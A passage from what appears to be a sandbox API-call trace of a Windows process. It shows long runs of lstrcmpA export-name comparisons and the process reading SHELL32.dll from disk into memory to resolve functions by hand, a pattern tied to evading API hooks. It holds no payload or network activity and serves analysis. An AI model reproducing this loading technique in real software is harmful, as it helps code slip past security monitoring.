(lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionList") returned 1 [0091.121] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0091.121] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ApiSetQueryApiSetPresence") returned 0 [0091.121] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAFinal") returned 1 [0091.121] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAInit") returned 1 [0091.121] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAUpdate") returned 1 [0091.121] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0091.121] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0091.121] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0091.121] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0091.121] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0091.121] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0091.121] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0091.121] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0091.121] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0091.121] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0091.121] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0091.121] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0091.121] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0091.121] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0091.121] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0091.122] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0091.122] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="CsrAllocateCaptureBuffer") returned 0 [0091.122] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAFinal") returned 1 [0091.122] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAInit") returned 1 [0091.122] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAUpdate") returned 1 [0091.122] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0091.122] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0091.122] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0091.122] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0091.122] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetHeaderSize") returned 1 [0091.122] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageAttribute") returned 1 [0091.122] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0091.122] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0091.122] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0091.122] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0091.122] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionList") returned 1 [0091.122] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0091.122] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRundownCompletionList") returned 1 [0091.122] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionList") returned 1 [0091.122] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0091.122] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0091.122] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateCaptureBuffer") returned 1 [0091.122] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateMessagePointer") returned 0 [0091.122] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAFinal") returned 1 [0091.122] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAInit") returned 1 [0091.122] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAUpdate") returned 1 [0091.122] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0091.122] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0091.123] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0091.123] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0091.123] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0091.123] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0091.123] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0091.123] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0091.123] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0091.123] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0091.123] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0091.123] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0091.123] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0091.123] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0091.123] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0095.203] GetProcessHeap () returned 0x5b0000 [0095.203] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x40ef040 | out: hHeap=0x5b0000) returned 1 [0095.213] GetProcessHeap () returned 0x5b0000 [0095.213] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5c9180 [0095.213] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x7ffc5cc80000 [0095.213] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0095.213] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0095.213] GetModuleFileNameA (in: hModule=0x7ffc5cc80000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")) returned 0x1f [0095.213] CreateFileA (lpFileName="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0095.214] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0095.214] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0095.214] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=22573656) returned 1 [0095.214] GetProcessHeap () returned 0x5b0000 [0095.214] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1587258) returned 0x40eb040 [0097.449] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0097.449] ReadFile (in: hFile=0x140, lpBuffer=0x40eb040, nNumberOfBytesToRead=0x1587258, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40eb040*, lpNumberOfBytesRead=0x14f5a4*=0x1587258, lpOverlapped=0x0) returned 1 [0101.618] CloseHandle (hObject=0x140) returned 1 [0101.618] lstrcmpA (lpString1="AppCompat_RunDLLW", lpString2="AppCompat_RunDLLW") returned 0 [0101.619] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AppCompat_RunDLLW") returned 1 [0101.619] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AssocCreateForClasses") returned 0 [0101.619] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AppCompat_RunDLLW") returned 1 [0101.619] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocCreateForClasses") returned 1 [0101.619] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocGetDetailsOfPropKey") returned 0 [0101.619] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AppCompat_RunDLLW") returned 1 [0101.619] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocCreateForClasses") returned 1 [0101.619] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0101.619] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="CDefFolderMenu_Create2") returned 0 [0101.619] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AppCompat_RunDLLW") returned 1 [0101.619] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocCreateForClasses") returned 1 [0101.619] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocGetDetailsOfPropKey") returned 1 [0101.619] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CDefFolderMenu_Create2") returned 1 [0101.619] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CIDLData_CreateFromIDArray") returned 0 [0101.620] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AppCompat_RunDLLW") returned 1 [0101.620] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocCreateForClasses") returned 1 [0101.620] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocGetDetailsOfPropKey") returned 1 [0101.922] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CDefFolderMenu_Create2") returned 1 [0101.922] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CIDLData_CreateFromIDArray") returned 1 [0101.922] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 0 [0101.922] lstrcmpA (lpString1="CheckEscapesW", lpString2="AppCompat_RunDLLW") returned 1 [0101.922] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocCreateForClasses") returned 1 [0101.922] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0101.922] lstrcmpA (lpString1="CheckEscapesW", lpString2="CDefFolderMenu_Create2") returned 1 [0101.922] lstrcmpA (lpString1="CheckEscapesW", lpString2="CIDLData_CreateFromIDArray") returned -1 [0101.922] lstrcmpA (lpString1="CheckEscapesW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0101.922] lstrcmpA (lpString1="CheckEscapesW", lpString2="CheckEscapesW") returned 0 [0101.922] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AppCompat_RunDLLW") returned 1 [0101.922] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocCreateForClasses") returned 1 [0101.922] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0101.922] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CDefFolderMenu_Create2") returned 1 [0101.922] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0101.922] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0101.922] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CheckEscapesW") returned 1 [0101.922] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CommandLineToArgvW") returned 0 [0101.922] lstrcmpA (lpString1="Control_RunDLL", lpString2="AppCompat_RunDLLW") returned 1 [0101.922] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocCreateForClasses") returned 1 [0101.922] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocGetDetailsOfPropKey") returned 1 [0101.922] lstrcmpA (lpString1="Control_RunDLL", lpString2="CDefFolderMenu_Create2") returned 1 [0101.922] lstrcmpA (lpString1="Control_RunDLL", lpString2="CIDLData_CreateFromIDArray") returned 1 [0101.922] lstrcmpA (lpString1="Control_RunDLL", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0101.923] lstrcmpA (lpString1="Control_RunDLL", lpString2="CheckEscapesW") returned 1 [0101.923] lstrcmpA (lpString1="Control_RunDLL", lpString2="CommandLineToArgvW") returned 1 [0101.923] lstrcmpA (lpString1="Control_RunDLL", lpString2="Control_RunDLL") returned 0 [0101.923] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AppCompat_RunDLLW") returned 1 [0101.923] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocCreateForClasses") returned 1 [0101.923] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocGetDetailsOfPropKey") returned 1 [0101.923] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CDefFolderMenu_Create2") returned 1 [0101.923] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CIDLData_CreateFromIDArray") returned 1 [0101.923] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0101.923] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CheckEscapesW") returned 1 [0101.923] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CommandLineToArgvW") returned 1 [0101.923] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLL") returned 1 [0101.923] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLLA") returned 0 [0101.923] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AppCompat_RunDLLW") returned 1 [0101.923] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocCreateForClasses") returned 1 [0101.923] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0101.923] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CDefFolderMenu_Create2") returned 1 [0101.923] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0101.923] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0101.923] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CheckEscapesW") returned 1 [0101.923] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CommandLineToArgvW") returned 1 [0101.923] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLL") returned 1 [0101.923] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLA") returned 1 [0101.923] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLAsUserW") returned 0 [0101.923] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AppCompat_RunDLLW") returned 1 [0101.923] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocCreateForClasses") returned 1 [0101.923] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0101.923] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CDefFolderMenu_Create2") returned 1 [0101.924] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0101.924] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0101.924] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CheckEscapesW") returned 1 [0101.924] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CommandLineToArgvW") returned 1 [0101.924] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLL") returned 1 [0101.924] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLA") returned 1 [0101.924] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLAsUserW") returned 1 [0101.924] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLW") returned 0 [0101.924] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0101.924] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0101.924] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0101.924] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0101.924] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0101.924] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0101.924] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0101.924] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0101.924] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0101.924] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0101.924] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0101.924] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0101.924] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 0 [0101.924] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0101.924] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0101.924] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0101.924] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0101.924] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0101.924] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0101.924] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0101.924] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0101.924] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0101.924] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0101.924] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0101.925] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0101.925] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0101.925] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 0 [0101.925] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0101.925] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0101.925] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0101.925] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0101.925] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0101.925] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0101.925] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CheckEscapesW") returned 1 [0101.925] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0101.925] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLL") returned 1 [0101.925] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLA") returned 1 [0101.925] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0101.925] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLW") returned 1 [0101.925] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0101.925] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0101.925] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 0 [0101.925] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0101.925] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0101.925] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0101.925] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0101.925] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0101.925] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0101.925] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0101.925] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0101.925] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0101.925] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0101.925] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0101.925] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0101.925] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0101.926] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0101.926] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0101.926] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 0 [0101.926] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0101.926] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0101.926] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0101.926] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0101.926] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0101.926] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0101.926] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0101.926] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0101.926] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0101.926] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0101.926] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0101.926] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0101.926] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0101.926] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0101.926] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0101.926] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0101.926] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 0 [0101.926] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AppCompat_RunDLLW") returned 1 [0101.926] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocCreateForClasses") returned 1 [0101.926] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocGetDetailsOfPropKey") returned 1 [0101.926] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CDefFolderMenu_Create2") returned 1 [0101.926] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CIDLData_CreateFromIDArray") returned 1 [0101.927] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0101.927] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CheckEscapesW") returned 1 [0101.927] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CommandLineToArgvW") returned 1 